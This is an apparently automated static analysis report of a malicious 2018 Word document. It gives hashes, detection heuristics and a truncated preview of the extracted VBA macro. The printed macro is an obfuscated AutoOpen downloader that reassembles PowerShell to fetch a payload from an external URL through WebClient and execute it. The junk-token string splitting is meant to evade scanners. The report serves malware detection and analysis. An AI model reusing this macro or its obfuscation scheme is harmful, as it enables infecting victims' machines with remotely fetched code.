Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 802303f9b2510a2f…

MALICIOUS

Office (OLE)

135.0 KB Created: 2018-02-15 00:33:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 33b599349f7081f45249c2b5fd2ed089 SHA-1: 1ae28ed29db0b7eaa6b2669cfd5e65b3ad18dfe8 SHA-256: 802303f9b2510a2fbeb1ded869b143b7e7377bda24b755aa2a85856c2122e905
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function. Additionally, an obfuscated auto-exec loader was detected, suggesting malicious intent. The VBA script attempts to download a payload from the URL 'amLSTsowZHbPzSfpiS-immob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl' and execute it, likely leading to further infection.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://9m4+9m4esenUpr In document text (OLE body)
    • http://real-expert.inf9m4mWc+mWc+9m4o9m4+9m4/9m4+9m4co9m4+9m4mp9m4+9m4on9m4+9m4ents/Pt09m4mWc+mIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26216 bytes
SHA-256: 7120fe1abcbaeee72667657b7b1087c85b80aa546088af999edd4b48f40028c4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lSajimqhmQYIO"
Function YYAfYup()
On Error Resume Next
iOETroDWbDf = (vERwzTt - Int(ssEGwz) * uJTGOcpAbYAdo / Oct(woArWf) - (KmqbEhknfiOLn - Sin(4698163)))
INDzBSluJBn = (jlmlFEpZwq - Int(vtDDPb) * EkWdfKuF / Oct(wumRAlV) - (PElalU - Sin(2385564)))
CUnKiRuQ = (lzmrkbOmtioGG - Int(bqArsf) * YEKXzo / Oct(qrTPKjt) - (IObUfzY - Sin(3493746)))
UwLANVsEi = (wncfklMIhSmCsB) + HJjkJKD("fscwLwrkVNHZiRX4ncbw+cbwlzmWcbw+cbwc+mWcV0O9m4mWc+'+'mWc+9m4adFIzV0lmWc+mWc9m4+9m4e9m4+9m4t9mWc+mWcm4+9m47W(cbw+'+'cbwc9m4+9m47tavzwf", 16, 114)
QozsMrAi = (AKzmNIwfh - Int(SZniAjPjvohaCX) * XTcwL / Oct(odEfYMI) - (LoIWBjq - Sin(7297935)))
pODlsLfUMoQ = (WfBBqbqa - Int(cjpoVi) * idwiwbTHT / Oct(zZEAoMlBGQK) - (zBOFRkZ - Sin(4576229)))
clVWbXALG = (SZATFtDTu - Int(uiGbQVG) * XDmPRLXjuUsK / Oct(ivNhADhiSii) - (EQdqawj - Sin(1986358)))
RuhwRk = (nEwBPZvWMRilQ) + HJjkJKD("amLSTsowZHbPzSfpiS-imm'+'ob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl", 19, 43)
TzbDGa = (pUWJznjbidsNl - Int(SzIabE) * wfhRlqzwfAuuC / Oct(fMRlpfKORYE) - (vlVwclqCroor - Sin(2834047)))
EuwtIRVKY = (icwdzTiZnnqpmY - Int(jOJMwuLdjXJ) * zsqYZ / Oct(sziPoalFV) - (iFmzRXHaifRCXz - Sin(3049169)))
oFzIwSKmviK = (oOihwO - Int(TubzTZjb) * YNudkJnckPuuE / Oct(aizimWWoBToTF) - (ZoAuDadJEmUib - Sin(1150339)))
ifKPsc = (suQSZFEVEDNu) + HJjkJKD("FWRodw[STRINg][cHAR]39))jzaD", 7, 18)
jzGXX = (dNOHuQrU - Int(SEAnJUJzwFtzdw) * ZiCAR / Oct(fksllGcpK) - (srbVN - Sin(749677)))
CXIuLHdhJf = (tcFBsY - Int(TzPLiQOr) * inTIC / Oct(NhInCBFCc) - (VUIXMTnMZSmr - Sin(3224698)))
CQQCkiPYs = (upAowi - Int(vGVOYtEWRNzmW) * vFTqLAG / Oct(klWQBtMAQFu) - (aNmJoZjqIFoEuu - Sin(9793381)))
jjOdPwiK = (oREzDwPzqiM) + HJjkJKD("dpXj9mmWc'+'+mWc4+9m4ectQEk) S9m4+9m4'+'yste9m4+9m4m.Net.We9m4+mWc+mWc9m4bC9'+'m4+9m4liecbw+cbwnt;c79m4+'+'9mcbw+cbw4tNScbw+cbwB9mmWc+mWc4+9m'+'4 cVYDzMQhXAaWJERUIiELBwlbbOwUBoNHhVw", 4, 144)
FurIoUhtS = (KBlQPafw - Int(WGudTSUL) * OrCQjh / Oct(hrIzLSIRQ) - (wzRYkrnal - Sin(7307131)))
zOHTcsa = (fwdWhUXq - Int(tUDshjWz) * DzdNzV / Oct(uiiAPqvv) - (Cuibiz - Sin(7256041)))
qbmVHd = (AccwZqBUnT - Int(omSzIBmmtqA) * ZIjfo / Oct(XcGLCMUtYVscf) - (XOHWjvWZrL - Sin(8595316)))
RQvILFZ = (JQwrsblh) + HJjkJKD("hTTzafhVtPHlpjR &( $ShELLID[1]+$sHELlID[13]+'x')(('. ( ([StrinG]xdCVerboSEpReFEilPu", 16, 64)
uifSjAArk = (BNwtVwl - Int(TSNvqkfiPCLhni) * dQGwZRcZbusm / Oct(NUHREfJRsj) - (slLBHMzWW - Sin(5222584)))
WSGimzjOpwz = (cPCMdrsm - Int(zwEUv) * ucHVVlhjDnFaRO / Oct(VPAvssOsCSYFjc) - (hrGLSUPBFjuiw - Sin(4820562)))
HrXUhJzc = (QaXDbiDYD - Int(fkFCw) * wEKFOUFwcGO / Oct(OzKPTiCzhfAKi) - (DImkJwJA - Sin(9247001)))
tqdGskWosz = (jFiPdRtQKYf) + HJjkJKD("vPXOiS,mWccbw+cbw+mWc9m4+9m4 uZhZuEicwkvRicj", 7, 23)
RFEWizwrPH = (EzbwRzJr - Int(PlNBjbzWGcGEfq) * HzOWTjzKC / Oct(YpsMiXSjYE) - (wEMoREuWr - Sin(2676785)))
jpJUvSJniRY = (IFoUinYNR - Int(KXIlHJcFoV) * lwLtBh / Oct(iDnKP) - (hmYKoiKKmwmjED - Sin(2055675)))
ZdOCRCW = (SQDsSWHdahFXjO - Int(zIJEUkRRJKww) * YMziq / Oct(kWHXjKfvjHY) - (aYImXuzqKAzu - Sin(6433804)))
BuXaEWsoZzG = (FtPRaAzw) + HJjkJKD("wrVvGAkuIbcqidvGKXswkvzmvrV+cbwRepLACEcbw+cbw(cbw+cbw9'+'m4cbw+cbwc7t9'+'m4,9m4rh59m4).RepLACE(9m4zPj'+'9m'+'4,cb'+'w+cbw[strIN'+'g]'+'mWc+mWc[CHAr]92) mWc+mWc)cbw+cbwmWc).REPlacE(mWccbw+cbwrh5LbicjRNF", 28, 166)
LGaRhGG = (WatmpCiAY - Int(WMpKlZrVXzF) * trumRFBWSp / Oct(JzzLSY) - (wjbuujvSIPw - Sin(2516290)))
JpHGvjlzw = (nSvjCrCkZwBR - Int(CjLoOZwrAYz) * wNqzwmZFDWrEQJ / Oct(WvXiZdNdPG) - (AXQvntvh - Sin(1104681)))
hdFGDRBDq = (MldMcMdjoH - Int(FwavdqaWj) * atclBoIjwIiD / Oct(KKtWzQkzazvvYq) - (KCVLWtlsAaaXUz - Sin(8222651)))
XcpdHPFzFu = (slduooiJk) + HJjkJKD("FjWc &9m4+c'+'bw+cbw9m4(9m4+9m4QEkn9m4+9m4Q9m4+9m4'+'Ek+QEk9m4cbw+cbw+9m4eQEkmWcbw'+'+cbwc+m'+'Wccbw+cbw+9m'+'4+9m4QEkw-o'+'bj'+'ecQEcbw+cbwk+QEktQmWccbw+cbw+mWc9m
... (truncated)